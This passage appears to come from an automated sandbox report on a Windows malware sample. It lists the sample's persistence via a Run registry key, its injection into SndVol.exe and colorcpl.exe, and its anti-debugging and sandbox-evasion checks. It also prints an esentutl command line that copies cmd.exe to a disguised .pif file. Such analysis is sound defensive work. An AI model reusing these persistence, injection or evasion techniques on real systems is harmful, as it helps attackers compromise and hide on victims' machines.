                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EDD1F8 push 02EDD288h; ret 0_2_02EDD280
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EDD144 push 02EDD1ECh; ret 0_2_02EDD1E4
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02ECF10C push ecx; mov dword ptr [esp], edx0_2_02ECF111
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EB6792 push 02EB67D6h; ret 0_2_02EB67CE
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EB6794 push 02EB67D6h; ret 0_2_02EB67CE
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EBD5B0 push 02EBD5DCh; ret 0_2_02EBD5D4
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EBC57C push ecx; mov dword ptr [esp], edx0_2_02EBC581
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EDC574 push 02EDC572h; ret 0_2_02EDC56A
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02ECAAE4 push 02ECAB1Ch; ret 0_2_02ECAB14
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EC8ADC push 02EC8B14h; ret 0_2_02EC8B0C
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EC8ADA push 02EC8B14h; ret 0_2_02EC8B0C
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EBCA5E push 02EBCD82h; ret 0_2_02EBCD7A
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EBCBFC push 02EBCD82h; ret 0_2_02EBCD7A
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EC887C push 02EC88BEh; ret 0_2_02EC88B6
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02F24850 push eax; ret 0_2_02F24920
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EC6958 push 02EC6A03h; ret 0_2_02EC69FB
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EC6956 push 02EC6A03h; ret 0_2_02EC69FB
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EC791C push 02EC7999h; ret 0_2_02EC7991
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EC5E8C push ecx; mov dword ptr [esp], edx0_2_02EC5E8E
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EC2F70 push 02EC2FE6h; ret 0_2_02EC2FDE
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_004000D8 push es; iretd 9_2_004000D9
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0040008C push es; iretd 9_2_0040008D
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_004542E6 push ecx; ret 9_2_004542F9

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Ntmftfld.PIFJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_004063C6 ShellExecuteW,URLDownloadToFileW,9_2_004063C6
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Ntmftfld.PIFJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,9_2_00418A00
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NtmftfldJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NtmftfldJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EB6772 IsIconic,0_2_02EB6772
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02ECAB20 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_02ECAB20
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\SndVol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ntmftfld.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ntmftfld.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0040E18D Sleep,ExitProcess,9_2_0040E18D
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_048EEF25 Sleep,ExitProcess,9_2_048EEF25
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_0040E18D Sleep,ExitProcess,13_2_0040E18D
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D3EF25 Sleep,ExitProcess,13_2_06D3EF25
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,9_2_004186FE
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,9_2_048F9496
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,13_2_004186FE
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,13_2_06D49496
                  Source: C:\Windows\SysWOW64\SndVol.exeWindow / User API: threadDelayed 3059Jump to behavior
                  Source: C:\Windows\SysWOW64\SndVol.exeWindow / User API: threadDelayed 6534Jump to behavior
                  Source: C:\Windows\SysWOW64\SndVol.exeWindow / User API: foregroundWindowGot 1761Jump to behavior
                  Source: C:\Windows\SysWOW64\esentutl.exeDropped PE file which has not been started: C:\Users\Public\xpha.pifJump to dropped file
                  Source: C:\Windows\SysWOW64\SndVol.exeAPI coverage: 5.1 %
                  Source: C:\Windows\SysWOW64\colorcpl.exeAPI coverage: 2.7 %
                  Source: C:\Windows\SysWOW64\SndVol.exe TID: 8024Thread sleep time: -84500s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\SndVol.exe TID: 8028Thread sleep time: -9177000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\SndVol.exe TID: 8028Thread sleep time: -19602000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EB5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02EB5908
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,9_2_0041A01B
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,9_2_0040B28E
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_0040838E
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_004087A0
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,9_2_00407848
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_004068CD FindFirstFileW,FindNextFileW,9_2_004068CD
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0044BA59 FindFirstFileExA,9_2_0044BA59
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,9_2_0040AA71
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,9_2_00417AAB
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,9_2_0040AC78
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_048E85E0 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,9_2_048E85E0
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_048E9538 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_048E9538
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_048E7665 FindFirstFileW,FindNextFileW,9_2_048E7665
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0492C7F1 FindFirstFileExA,9_2_0492C7F1
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_048EC026 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,9_2_048EC026
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_048E9126 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_048E9126
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_048FADB3 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,9_2_048FADB3
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_048EB809 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,9_2_048EB809
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_048F8843 FindFirstFileW,9_2_048F8843
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_048EBA10 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,9_2_048EBA10
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,13_2_0041A01B
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,13_2_0040B28E
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,13_2_0040838E
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,13_2_004087A0
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,13_2_00407848
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_004068CD FindFirstFileW,FindNextFileW,13_2_004068CD
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_0044BA59 FindFirstFileExA,13_2_0044BA59
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,13_2_0040AA71
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,13_2_00417AAB
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,13_2_0040AC78
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D37665 FindFirstFileW,FindNextFileW,13_2_06D37665
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D7C7F1 FindFirstFileExA,13_2_06D7C7F1
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D385E0 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,13_2_06D385E0
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D39538 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,13_2_06D39538
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D3C026 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,13_2_06D3C026
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D39126 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,13_2_06D39126
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D4ADB3 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,13_2_06D4ADB3
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D3BA10 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,13_2_06D3BA10
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D48843 FindFirstFileW,13_2_06D48843
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D3B809 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,13_2_06D3B809
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,9_2_00406D28
                  Source: 1m181Ru74o.exe, 00000000.00000002.1424747239.000000000060E000.00000004.00000020.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1424747239.0000000000659000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: 1m181Ru74o.exe, 00000000.00000002.1424747239.0000000000659000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWN^
                  Source: Ntmftfld.PIF, 0000000B.00000002.1546846598.0000000000693000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
                  Source: SndVol.exe, 00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmp, Ntmftfld.PIF, 0000000E.00000002.1616931145.0000000000775000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeAPI call chain: ExitProcess graph end nodegraph_0-32464
                  Source: C:\Windows\SysWOW64\SndVol.exeAPI call chain: ExitProcess graph end nodegraph_9-94465
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02ECF748 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_02ECF748
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\Public\Libraries\Ntmftfld.PIFProcess queried: DebugPortJump to behavior
                  Source: C:\Users\Public\Libraries\Ntmftfld.PIFProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_004327AE
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EC895C LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02EC895C
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_004407B5 mov eax, dword ptr fs:[00000030h]9_2_004407B5
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_048E1146 mov eax, dword ptr fs:[00000030h]9_2_048E1146
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_048E1146 mov eax, dword ptr fs:[00000030h]9_2_048E1146
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0492154D mov eax, dword ptr fs:[00000030h]9_2_0492154D
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_004407B5 mov eax, dword ptr fs:[00000030h]13_2_004407B5
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D31146 mov eax, dword ptr fs:[00000030h]13_2_06D31146
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D31146 mov eax, dword ptr fs:[00000030h]13_2_06D31146
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D7154D mov eax, dword ptr fs:[00000030h]13_2_06D7154D
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_00410763 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,9_2_00410763
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_004327AE
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_004328FC SetUnhandledExceptionFilter,9_2_004328FC
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_004398AC
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00432D5C
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_04913546 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_04913546
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_04913694 SetUnhandledExceptionFilter,9_2_04913694
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0491A644 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_0491A644
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_04913AF4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_04913AF4
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_004327AE
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_004328FC SetUnhandledExceptionFilter,13_2_004328FC
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_004398AC
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00432D5C
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D63694 SetUnhandledExceptionFilter,13_2_06D63694
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D6A644 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_06D6A644
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D63546 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_06D63546
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D63AF4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_06D63AF4

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeMemory allocated: C:\Windows\SysWOW64\SndVol.exe base: 48E0000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\Public\Libraries\Ntmftfld.PIFMemory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 6D30000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\Public\Libraries\Ntmftfld.PIFMemory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 7090000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeThread created: C:\Windows\SysWOW64\SndVol.exe EIP: 48E15CEJump to behavior
                  Source: C:\Users\Public\Libraries\Ntmftfld.PIFThread created: C:\Windows\SysWOW64\colorcpl.exe EIP: 6D315CEJump to behavior
                  Source: C:\Users\Public\Libraries\Ntmftfld.PIFThread created: C:\Windows\SysWOW64\colorcpl.exe EIP: 70915CEJump to behavior
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeMemory written: C:\Windows\SysWOW64\SndVol.exe base: 48E0000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\Public\Libraries\Ntmftfld.PIFMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 6D30000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\Public\Libraries\Ntmftfld.PIFMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 7090000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeMemory written: C:\Windows\SysWOW64\SndVol.exe base: 48E0000Jump to behavior
                  Source: C:\Users\Public\Libraries\Ntmftfld.PIFMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 6D30000Jump to behavior
                  Source: C:\Users\Public\Libraries\Ntmftfld.PIFMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 7090000Jump to behavior
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe9_2_00410B5C
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe13_2_00410B5C
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_004175E1 mouse_event,9_2_004175E1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /oJump to behavior
                  Source: SndVol.exe, 00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager'
                  Source: SndVol.exe, 00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerC
                  Source: SndVol.exe, 00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: SndVol.exe, 00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managero
                  Source: SndVol.exe, 00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerM
                  Source: SndVol.exe, 00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager,
                  Source: SndVol.exe, 00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager1Z\
                  Source: SndVol.exe, 00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: SndVol.exe, 00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager5
                  Source: SndVol.exe, 00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manageru
                  Source: SndVol.exe, 00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerQ
                  Source: SndVol.exe, 00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager2
                  Source: SndVol.exe, 00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager}
                  Source: SndVol.exe, 00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmp, logs.dat.9.drBinary or memory string: [Program Manager]
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_004329DA cpuid 9_2_004329DA
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02EB5ACC
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: GetLocaleInfoA,0_2_02EBA7D4
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02EB5BD8
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: GetLocaleInfoA,0_2_02EBA820
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,9_2_0044F17B
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,9_2_0044F130
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,9_2_0044F216
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,9_2_0044F2A3
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoA,9_2_0040E2BB
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,9_2_0044F4F3
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,9_2_0044F61C
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,9_2_0044F723
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,9_2_0044F7F0
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,9_2_00445914
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,9_2_00445E1C
